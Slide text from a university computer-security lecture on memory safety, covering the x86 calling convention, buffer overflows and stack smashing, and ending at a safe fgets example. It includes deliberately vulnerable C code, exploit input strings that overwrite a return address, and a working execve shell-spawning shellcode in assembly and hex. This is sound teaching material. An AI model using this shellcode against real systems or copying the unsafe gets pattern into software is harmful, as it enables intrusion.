1 of 94

Memory Safety Vulnerabilities

CS 161 Fall 2022 - Lecture 3

Computer Science 161

Fall 2022

2 of 94

Announcements

  • Homework 1 is due on Friday, September 9, 11:59 PM PT

2

Computer Science 161

Fall 2022

3 of 94

Today: Memory Safety Vulnerabilities

  • Buffer overflows
    • Stack smashing
    • Memory-safe code
  • Integer memory safety vulnerabilities
  • Format string vulnerabilities
  • Heap vulnerabilities
  • Writing robust exploits

3

Computer Science 161

Fall 2022

4 of 94

Review: x86 Calling Convention

Textbook Chapter 2.8 & 2.9

4

Computer Science 161

Fall 2022

5 of 94

Review: Registers

  • EIP: instruction pointer, points to the next instruction to be executed
  • EBP: base pointer, points to top of the current stack frame
  • ESP: stack pointer, points to lowest item on the stack

5

Computer Science 161

Fall 2022

6 of 94

Review: Instructions

  • push src
    • ESP moves one word down
    • Puts the value in src at the current ESP
  • pop dst
    • Copies the lowest value on the stack (where ESP is pointing) into dst
    • ESP moves one word up
  • mov src dst
    • Copies the value in src into dst

6

Computer Science 161

Fall 2022

7 of 94

Calling a Function in x86

7

caller code

callee code

caller code

callee code

caller code

callee code

EBP

Caller frame

ESP

Before function call

EIP

Stack

Code

EBP

ESP

During function call

Caller frame

Callee frame

EIP

Stack

Code

Caller frame

After function call

EBP

ESP

EIP

Stack

Code

Computer Science 161

Fall 2022

8 of 94

Steps of an x86 Function Call

  1. Push arguments on the stack
  2. Push old EIP (RIP) on the stack
  3. Move EIP
  4. Push old EBP (SFP) on the stack
  5. Move EBP
  6. Move ESP
  7. Execute the function
  8. Move ESP
  9. Pop (restore) old EBP (SFP)
  10. Pop (restore) old EIP (RIP)
  11. Remove arguments from stack

8

caller

caller

callee

Computer Science 161

Fall 2022

9 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

int callee(int a, int b) {� int local;� return 42;�}��void caller(void) {� callee(1, 2);�}

9

Here is a snippet of C code

Here is the code compiled into x86 assembly

Computer Science 161

Fall 2022

10 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

10

The instruction that was just executed is in red

int callee(int a, int b) {� int local;� return 42;�}

The EIP points to the address of the next instruction!

EIP

Computer Science 161

Fall 2022

11 of 94

x86 Function Call

void caller(void) {� callee(1, 2);�}

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

11

Here is a diagram of the stack. Remember, each row represents 4 bytes (32 bits).

int callee(int a, int b) {� int local;� return 42;�}

EIP

Computer Science 161

Fall 2022

12 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

  • The EBP and ESP registers point to the top and bottom of the current stack frame.

12

caller stack frame

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

13 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

1. Push arguments on the stack

  • The push instruction decrements the ESP to make space on the stack
  • Arguments are pushed in reverse order

13

EBP

caller stack frame

2

int callee(int a, int b) {� int local;� return 42;�}

ESP

EIP

Computer Science 161

Fall 2022

14 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

1. Push arguments on the stack

  • The push instruction decrements the ESP to make space on the stack
  • Arguments are pushed in reverse order

14

caller stack frame

2

1

EBP

int callee(int a, int b) {� int local;� return 42;�}

ESP

EIP

Computer Science 161

Fall 2022

15 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

2. Push old EIP (RIP) on the stack�3. Move EIP

  • The call instruction does 2 things
  • First, it pushes the current value of EIP (the address of the next instruction in caller) on the stack.
  • The saved EIP value on the stack is called the RIP (return instruction pointer).
  • Second, it changes EIP to point to the instructions of the callee.

15

caller stack frame

2

1

Return Instruction Pointer

EBP

int callee(int a, int b) {� int local;� return 42;�}

ESP

EIP

Computer Science 161

Fall 2022

16 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

  • The next 3 steps set up a stack frame for the callee function.
  • These instructions are sometimes called the function prologue, because they appear at the start of every function.

16

caller stack frame

2

1

Return Instruction Pointer

Function prologue

EBP

int callee(int a, int b) {� int local;� return 42;�}

ESP

EIP

Computer Science 161

Fall 2022

17 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

4. Push old EBP (SFP) on the stack

  • We need to restore the value of the EBP when returning, so we push the current value of the EBP on the stack.
  • The saved value of the EBP on the stack is called the saved frame pointer (SFP).

17

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

EBP

int callee(int a, int b) {� int local;� return 42;�}

ESP

EIP

Computer Science 161

Fall 2022

18 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

5. Move EBP

  • This instruction moves the EBP down to where the ESP is located.

18

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

EBP

ESP

int callee(int a, int b) {� int local;� return 42;�}

EIP

Computer Science 161

Fall 2022

19 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

6. Move ESP

  • This instruction moves esp down to create space for a new stack frame.

19

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

20 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

7. Execute the function

  • Now that the stack frame is set up, the function can begin executing.
  • This function just returns 42, so we put 42 in the EAX register. (Recall the return value is placed in EAX.)

20

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

local

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

21 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

  • The next 3 steps restore the caller’s stack frame.
  • These instructions are sometimes called the function epilogue, because they appear at the end of every function.

21

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

local

Function epilogue

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

22 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

8. Move ESP

  • This instruction moves the ESP up to where the EBP is located.
  • This effectively deletes the space allocated for the callee stack frame.

22

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

local

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

23 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

9. Pop (restore) old EBP (SFP)

  • The pop instruction puts the SFP (saved EBP) back in EBP.
  • It also increments ESP to delete the popped SFP from the stack.

23

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

local

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

24 of 94

x86 Function Call

caller:

...

push $2

push $1

call callee

add $8, %esp

...

callee:

push %ebp

mov %esp, %ebp

sub $4, %esp

mov $42, %eax

mov %ebp, %esp

pop %ebp

ret

void caller(void) {� callee(1, 2);�}

11. Remove arguments from stack

  • Back in the caller, we increment ESP to delete the arguments from the stack.
  • The stack has returned to its original state before the function call!

24

caller stack frame

2

1

Return Instruction Pointer

Saved Frame Pointer

local

int callee(int a, int b) {� int local;� return 42;�}

EBP

ESP

EIP

Computer Science 161

Fall 2022

25 of 94

Buffer Overflow Vulnerabilities

25

Textbook Chapter 3.1

Computer Science 161

Fall 2022

26 of 94

Consider an Airport Terminal…

26

Computer Science 161

Fall 2022

27 of 94

Consider an Airport “Terminal”…

27

#293 HRE-THR 850 1930

ALICE SMITH


ECONOMY

SPECIAL INSTRUX: NONE


Computer Science 161

Fall 2022

28 of 94

Consider an Airport “Terminal”…

28

Computer Science 161

Fall 2022

29 of 94

Consider an Airport “Terminal”…

29

#293 HRE-THR 850 1930

ALICE SMITH
HHHHHHHHHH

HHONOMY

SPECIAL INSTRUX: NONE


How could Alice exploit this?

Computer Science 161

Fall 2022

30 of 94

Consider an Airport “Terminal”…

30

#293 HRE-THR 850 1930

ALICE SMITH


FIRST

SPECIAL INSTRUX: NONE


By inserting padding characters (spaces) and exploiting the lack of boundaries between lines, Alice now appears to be in first class!

Takeaway: Attackers can exploit lack of boundaries to control areas (memory, as we will see shortly) that they aren’t supposed to control

Computer Science 161

Fall 2022

31 of 94

Buffer Overflow Vulnerabilities

  • Recall: C has no concept of array length; it just sees a sequence of bytes
  • If you allow an attacker to start writing at a location and don’t define when they must stop, they can overwrite other parts of memory!

31

char name[4];

name[5] = 'a';

a

name[0]

name[1]

name[2]

name[3]

name[5]

This is technically valid C code, because C doesn’t check bounds!

Computer Science 161

Fall 2022

32 of 94

Vulnerable Code

32

char name[20];

void vulnerable(void) {

...

gets(name);

...

}

The gets function will write bytes until the input contains a newline ('\n'), not when the end of the array is reached!

Okay, but there’s nothing to overwrite—for now…

Computer Science 161

Fall 2022

33 of 94

Vulnerable Code

33

char name[20];

char instrux[20] = "none";

void vulnerable(void) {

...

gets(name);

...

}

What does the memory diagram of static data look like now?

Computer Science 161

Fall 2022

34 of 94

Vulnerable Code

34

char name[20];

char instrux[20] = "none";

void vulnerable(void) {

...

gets(name);

...

}

...

...

...

...

...

instrux

instrux

instrux

instrux

instrux

name

name

name

name

name

gets starts writing here and can overwrite anything above name!

What can go wrong here?

Note: name and instrux are declared in static memory (outside of the stack), which is why name is below instrux

Computer Science 161

Fall 2022

35 of 94

Vulnerable Code

35

char name[20];

int authenticated = 0;

void vulnerable(void) {

...

gets(name);

...

}

...

...

...

...

...

...

...

...

...

authenticated

name

name

name

name

name

gets starts writing here and can overwrite the authenticated flag!

What can go wrong here?

Computer Science 161

Fall 2022

36 of 94

Vulnerable Code

36

char line[512];

char command[] = "/usr/bin/ls";

int main(void) {

...

gets(line);

...

execv(command, ...);

}

...

...

...

...

...

...

...

...

command

command

command

line

...

line

line

What can go wrong here?

Computer Science 161

Fall 2022

37 of 94

Vulnerable Code

37

char name[20];

int (*fnptr)(void);

void vulnerable(void) {

...

gets(name);

...

fnptr();

}

...

...

...

...

...

...

...

...

...

fnptr

name

name

name

name

name

fnptr is called as a function, so the EIP jumps to an address of our choosing!

What can go wrong here?

Computer Science 161

Fall 2022

38 of 94

Top 25 Most Dangerous Software Weaknesses (2020)

38

Rank

ID

Name

Score

[1]

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

46.82

[2]

Out-of-bounds Write

46.17

[3]

Improper Input Validation

33.47

[4]

Out-of-bounds Read

26.50

[5]

Improper Restriction of Operations within the Bounds of a Memory Buffer

23.73

[6]

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

20.69

[7]

Exposure of Sensitive Information to an Unauthorized Actor

19.16

[8]

Use After Free

18.87

[9]

Cross-Site Request Forgery (CSRF)

17.29

[10]

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

16.44

[11]

Integer Overflow or Wraparound

15.81

[12]

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

13.67

[13]

NULL Pointer Dereference

8.35

[14]

Improper Authentication

8.17

[15]

Unrestricted Upload of File with Dangerous Type

7.38

[16]

Incorrect Permission Assignment for Critical Resource

6.95

[17]

Improper Control of Generation of Code ('Code Injection')

6.53

Computer Science 161

Fall 2022

39 of 94

Stack Smashing

39

Textbook Chapter 3.2

Computer Science 161

Fall 2022

40 of 94

Stack Smashing

  • The most common kind of buffer overflow
  • Occurs on stack memory
  • Recall: What does are some values on the stack an attacker can overflow?
    • Local variables
    • Function arguments
    • Saved frame pointer (SFP)
    • Return instruction pointer (RIP)
  • Recall: When returning from a program, the EIP is set to the value of the RIP saved on the stack in memory
    • Like the function pointer, this lets the attacker choose an address to jump (return) to!

40

Computer Science 161

Fall 2022

41 of 94

Note: Python Syntax

  • For this class, you will see Python syntax used to represent sequences of bytes
    • This syntax will be used in Project 1 and on exams!
  • Adding strings: Concatenation
    • 'abc' + 'def' == 'abcdef'
  • Multiplying strings: Repeated concatenation
    • 'a' * 5 == 'aaaaa'
    • 'cs161' * 3 == 'cs161cs161cs161'

41

Computer Science 161

Fall 2022

42 of 94

Note: Python Syntax

  • Raw bytes
    • len('\xff') == 1
  • Characters can be represented as bytes too
    • '\x41' == 'A'
    • ASCII representation: All characters are bytes, but not all bytes are characters
  • Note for the project: '\\' is a literal backslash character
    • len('\\xff') == 4, because the slash is escaped first
      • This is a literal slash character, a literal 'x' character, and 2 literal 'f' characters
      • '\\xff' == '\x5c\x78\x66\x66'

42

Computer Science 161

Fall 2022

43 of 94

Overwriting the RIP

43

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

name

name

gets starts writing here and can overwrite anything above name, including the RIP!

void vulnerable(void) {

char name[20];

gets(name);

}

Assume that the attacker wants to execute instructions at address 0xdeadbeef.

name

SFP

RIP

What should an attacker supply as input to the gets function?

What value should the attacker write in memory? Where should the value be written?

Computer Science 161

Fall 2022

44 of 94

Overwriting the RIP

  • Input: 'A' * 24 + '\xef\xbe\xad\xde'
    • 24 garbage bytes to overwrite all of name and the SFP of vulnerable
    • The address of the instructions we want to execute
      • Remember: Addresses are little-endian!
  • What if we want to execute instructions that aren’t in memory?

44

void vulnerable(void) {

char name[20];

gets(name);

}

Note the NULL byte that terminates the string, automatically added by gets!

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

...

...

'\xef'

'\xbe'

'\xad'

'\xde'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

name

SFP

RIP

Computer Science 161

Fall 2022

45 of 94

Writing Malicious Code

  • The most common way of executing malicious code is to place it in memory yourself
    • Recall: Machine code is made of bytes
  • Shellcode: Malicious code inserted by the attacker into memory, to be executed using a memory safety exploit
    • Called shellcode because it usually spawns a shell (terminal)
    • Could also delete files, run another program, etc.

45

xor %eax, %eax�push %eax�push $0x68732f2f�push $0x6e69622f�mov %esp, %ebx�mov %eax, %ecx�mov %eax, %edx�mov $0xb, %al�int $0x80

0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x89 0xc1 0x89 0xc2 0xb0 0x0b 0xcd 0x80

Assembler

Computer Science 161

Fall 2022

46 of 94

Putting Together an Attack

  1. Find a memory safety (e.g. buffer overflow) vulnerability
  2. Write malicious shellcode at a known memory address
  3. Overwrite the RIP with the address of the shellcode
    • Often, the shellcode can be written and the RIP can be overwritten in the same function call (e.g. gets), like in the previous example
  4. Return from the function
  5. Begin executing malicious shellcode

46

Computer Science 161

Fall 2022

47 of 94

Constructing Exploits

47

void vulnerable(void) {

char name[20];

gets(name);

}

Let SHELLCODE be a 12-byte shellcode. Assume that the address of name is 0xbfffcd40.

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

name

name

name

SFP

RIP

0xbfffcd5c

0xbfffcd58

0xbfffcd54

0xbfffcd50

0xbfffcd4c

0xbfffcd48

0xbfffcd44

0xbfffcd40

What should an attacker supply as input to the gets function?

What values should the attacker write in memory? Where should the values be written?

Computer Science 161

Fall 2022

48 of 94

Constructing Exploits

  • Input: SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'
    • 12 bytes of shellcode
    • 12 garbage bytes to overwrite the rest of name and the SFP of vulnerable
    • The address of where we placed the shellcode

48

0xbfffcd5c

0xbfffcd58

0xbfffcd54

0xbfffcd50

0xbfffcd4c

0xbfffcd48

0xbfffcd44

0xbfffcd40

void vulnerable(void) {

char name[20];

gets(name);

}

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

...

...

'\x40'

'\xcd'

'\xff'

'\xbf'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

SHELLCODE

SHELLCODE

SHELLCODE

name

SFP

RIP

Computer Science 161

Fall 2022

49 of 94

Constructing Exploits

  • Alternative: 'A' * 12 + SHELLCODE + '\x4c\xcd\xff\xbf'
    • The address changed! Why?
      • We placed our shellcode at a different address (name + 12)!

49

0xbfffcd5c

0xbfffcd58

0xbfffcd54

0xbfffcd50

0xbfffcd4c

0xbfffcd48

0xbfffcd44

0xbfffcd40

void vulnerable(void) {

char name[20];

gets(name);

}

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

...

...

'\x4c'

'\xcd'

'\xff'

'\xbf'

SHELLCODE

SHELLCODE

SHELLCODE

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

name

SFP

RIP

Computer Science 161

Fall 2022

50 of 94

Constructing Exploits

50

void vulnerable(void) {

char name[20];

gets(name);

}

What if the shellcode is too large? Now let SHELLCODE be a 28-byte shellcode. What should the attacker input?

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

name

name

name

SFP

RIP

0xbfffcd5c

0xbfffcd58

0xbfffcd54

0xbfffcd50

0xbfffcd4c

0xbfffcd48

0xbfffcd44

0xbfffcd40

Computer Science 161

Fall 2022

51 of 94

Constructing Exploits

  • Solution: Place the shellcode after the RIP!
    • This works because gets lets us write as many bytes as we want
    • What should the address be?
  • Input: 'A' * 24 + '\x5c\xcd\xff\xbf' + SHELLCODE
    • 24 bytes of garbage
    • The address of where we placed the shellcode
    • 28 bytes of shellcode

51

0xbfffcd5c

0xbfffcd58

0xbfffcd54

0xbfffcd50

0xbfffcd4c

0xbfffcd48

0xbfffcd44

0xbfffcd40

void vulnerable(void) {

char name[20];

gets(name);

}

'\x00'

...

...

...

SHELLCODE

SHELLCODE

SHELLCODE

SHELLCODE

SHELLCODE

SHELLCODE

SHELLCODE

'\x5c'

'\xcd'

'\xff'

'\xbf'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

'A'

name

SFP

RIP

Computer Science 161

Fall 2022

52 of 94

Walking Through a Buffer Overflow

52

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

name

name

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

53 of 94

Walking Through a Buffer Overflow

53

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

name

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

54 of 94

Walking Through a Buffer Overflow

54

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

name

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

55 of 94

Walking Through a Buffer Overflow

55

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

name

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

56 of 94

Walking Through a Buffer Overflow

56

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

name

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

57 of 94

Walking Through a Buffer Overflow

57

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

SFP of vulnerable

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Computer Science 161

Fall 2022

58 of 94

Walking Through a Buffer Overflow

58

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

RIP of vulnerable

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

We overwrite the SFP (saved EBP) with 'AAAA', so the SFP is now pointing at the (probably invalid) address AAAA (0x41414141)

Computer Science 161

Fall 2022

59 of 94

Walking Through a Buffer Overflow

59

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

We overwrite the RIP (saved EIP) with the address of our shellcode 0xbfffcd40, so the RIP is now pointing at our shellcode! Remember, this value will be restored to EIP (the instruction pointer) later.

Computer Science 161

Fall 2022

60 of 94

Walking Through a Buffer Overflow

60

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Returning from gets: Move ESP up by 4.

Computer Science 161

Fall 2022

61 of 94

Walking Through a Buffer Overflow

61

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Function epilogue: Move ESP to EBP.

Computer Science 161

Fall 2022

62 of 94

Walking Through a Buffer Overflow

62

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Function epilogue: Restore the SFP into EBP. We overwrote SFP to 'AAAA', so the EBP now also points to the address 'AAAA'. We don’t really care about EBP, though.

Computer Science 161

Fall 2022

63 of 94

Walking Through a Buffer Overflow

63

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

Function epilogue: Restore the RIP into EIP. We overwrote RIP to the address of shellcode, so the EIP (instruction pointer) now points to our shellcode!

Computer Science 161

Fall 2022

64 of 94

Walking Through a Buffer Overflow

64

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

...

'\x00'

...

(RIP) 0xbfffcd40

(SFP) 'AAAA'

(name) 'AAAA'

(name) 'AAAA'

(name) SHELLCODE

(name) SHELLCODE

(name) SHELLCODE

...

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

ESP

Input:

SHELLCODE + 'A' * 12 + '\x40\xcd\xff\xbf'

sh # _

Computer Science 161

Fall 2022

65 of 94

Memory-Safe Code

65

Computer Science 161

Fall 2022

66 of 94

Still Vulnerable Code?

66

void vulnerable?(void) {

char *name = malloc(20);

...

gets(name);

...

}

Heap overflows are also vulnerable!

Computer Science 161

Fall 2022

67 of 94

Solution: Specify the Size

67

void safe(void) {

char name[20];

...

fgets(name, 20, stdin);

...

}

The length parameter specifies the size of the buffer and won’t write any more bytes—no more buffer overflows!

Warning: Different functions take slightly different parameters

Computer Science 161

Fall 2022

68 of 94

